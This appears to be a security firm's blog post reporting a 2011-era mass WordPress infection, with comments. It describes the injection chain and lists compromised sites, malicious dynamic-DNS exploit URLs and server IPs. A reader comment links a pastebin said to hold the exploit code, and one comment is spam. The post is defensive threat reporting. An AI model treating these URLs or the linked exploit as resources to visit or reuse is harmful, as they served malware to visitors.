Mass WordPress infection ongoing--most malicious domains using changeip.com

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(
To peer researchers: As we all know, researching security incidents take a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families, in order to research and publish threats fast enough.

In the past, usually right after we publish our blog and tweet the link, some other security blogs will very quickly put out a post regarding the same incident. Usually there will be a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our contents were plainly copied and there was no credit linking to us. We sincerely hope this won't happen.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!
)

We've been tracking an ongoing mass WordPress infection that began to take place around Oct 5th, as detected by our HackAlert Website monitoring service. Many Wordpress sites have been hit. Using technologyadvances.net as an example, we've created a video showing how an affected WordPress site can infect its visitors.


[Summary]
1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:

http://technologyadvances.net/
http://dacwada.com/
http://gadgetgad.com/
http://atozdogbreed.com/
http://goaonwheels.com/
http://uprofitpro.com/
http://fitnorama.com/
http://wpsupportdesk.com/
http://positivelypowerful.com/
http://mybravetruehero.com/
http://heavingdeadcats.com/
http://wpsupportdesk.com/
http://pakprwire.com/
http://browndoggadgets.com/
http://ozfoodtrainer.com/
http://batangyagit.com/
http://bellamediterranean.com/
http://michaelbang.com/
http://kharlota.com/
http://prendilo.com/
http://bilgizah.com/
http://rapidshareleaks.com/
http://girlsonandroid.com/
http://keyhousemedia.com/
http://ryan-key.com/
http://theme-wordpress.com/
http://bx-design.com/
http://the396.com/
http://riverstreetsavannah.com/
http://jardin-jms.com/
http://civitanews.it/
http://capture-the-light.de/
http://spio.it/
http://smfbd.org/
http://utopianwebstrategy.com.au/
http://techmoes.com/
http://24print.lv/
http://vancsa.com/
http://hsncweb.org/
http://anyabarat.hu/
http://creativevisions.org/
http://znews24.com/
http://insidegames.ch/
http://pujckainfo.cz/
http://hdmovies.ro/
http://facilefinanza.it/
http://eflomi.de/
http://lavorareonline.org/
http://shamanicseduction.net/
http://zhutoo.com/
http://fvrc.ru/
http://amazingresorts.co.uk/
http://fotoskaufen.de/
http://vus.de/
http://pohodaveskole.net/
http://geekyfaust.info/
http://tblt.de/
http://internetbusinessuniversity.net/
http://www.paypal-deals.nl/
http://athletics.midsouthcc.edu/
http://blog.asolorep.org/
http://www.nc-council.org/
http://www.paypal-nederland.nl/
http://www.paypal-promo.nl/
http://www.paypal-deals.nl/
http://www.midsouthcc.edu/finaid/
http://www.steinway-gallery.com.sg/

7. Malicous domains: This time, instead of owning the malicious domains themselves, the attackers are using mostly the dynamic DNS service provided by changeip.com. A sample list is as follows:

http://qwqe.dnset.com/showthread.php?t=72241732
http://fadfgsa.toh.info/showthread.php?t=72241732
http://fdfsd.ftp1.biz/showthread.php?t=72241732
http://gsdgs.ftp1.biz/showthread.php?t=72241732
http://fdsfad.4dq.com/showthread.php?t=72241732
http://qwqewqr.ce.ms/showthread.php?t=72241732
http://vxzdbgvsx.ce.ms/showthread.php?t=72241732
http://vgfsgfd.ns02.us/showthread.php?t=72241732
http://fdsfgs.qpoe.com/showthread.php?t=72241732
http://fdafdas.jkub.com/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://fdafad.ce.ms/showthread.php?t=72241732
http://fdafdas.ce.ms/showthread.php?t=72241732
http://fdasfad.ce.ms/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadsvzx.3-a.net/showthread.php?t=72241732
http://fdhd.2waky.com/showthread.php?t=72241732
http://gsdgs.ddns.info/showthread.php?t=72241732
http://fdafad.dns04.com/showthread.php?t=72241732
http://fadfda.epac.to/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadfa.isasecret.com/showthread.php?t=72241732
http://fdafda.itemdb.com/showthread.php?t=72241732
http://fzxvz.ninth.biz/showthread.php?t=72241732
http://gsfgs.dns-stuff.com/showthread.php?t=72241732
http://fdafd.dns-dns.com/showthread.php?t=72241732
http://fdafda.dynssl.com/showthread.php?t=72291731
http://wqwwer.ce.ms/showthread.php?t=72291731
http://vandamm.345.pl/iframe.php?id=2b8325qvzjut0iv8b87u9nlxnan0kpc

8. Malicous domains: Although all of the above domains were resolving through changeip.com, there are only a few IPs used so far, including the following:

1. 95.163.66.209 (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. 64.131.75.19 (AS25847, United States New York Smv)
3. 182.18.185.82 (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple way is to check for the existence of the following text: a) showthread b) 72241732 c) 72291731 and if these exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.

[Details]

The injection has a simple chain:

1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:

6 comments:

Julien said...

You have saved my lige guy!!!

Scumlabs said...

How do we fix it?..

GaiaLogic said...

While it's fantastic that I now know what it is and what it does, how about telling us all hot to locate and remove it? I see a lot of people out there talking about this, but no one seems to be able to tell us noobs how to deal with it.
This is why these things continue to happen on a massive scale, it takes us months to find an effective solution because all the people discussing it either think we all should know how to deal with it or just can't be bothered to explain it!
Tell people how to fix these things, then maybe we wouldn't be seeing all these.

Then again, maybe it serves some that millions of people don't know?

Andrew said...

This exploit's php contents are here: http://pastebin.com/3aqLniZN
They seem to like to use timthumb.php as a method for injecting their code (most likely other known exploits as well), so make sure you have the newest version of that file as well as all the security updates installed!

JF Agno said...

I'm one of the infected in the list, but i think i have removed it how should i know if i'm still infected?

viagra said...

Nice information, I really appreciate the way you presented.Thanks for sharing

Post a Comment